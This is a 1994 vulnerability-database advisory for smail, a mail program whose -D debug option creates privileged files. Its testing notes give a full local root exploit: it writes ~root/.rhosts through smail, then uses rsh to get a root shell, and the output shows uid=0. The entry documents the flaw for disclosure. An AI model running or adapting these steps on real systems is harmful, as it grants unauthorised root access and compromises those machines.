smail -D Parameter Arbitrary Privileged File Creation

1994-10-06T03:27:11
ID OSVDB:17056
Type osvdb
Reporter OSVDB
Modified 1994-10-06T03:27:11

Description

Manual Testing Notes

$ cat > ~/.forward

localhost user ^D $ smail -bs -D ~root/.rhosts -v20 220 [victim] Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12:23 PDT expn user 250 user quit 221 [victim] closing connection

$ rsh -l root localhost tcsh -i Warning: no access to tty (Bad file number). Thus no job control in this shell.

id

uid=0(root) gid=0(root)

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/1994_4/0060.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/1994_4/0103.html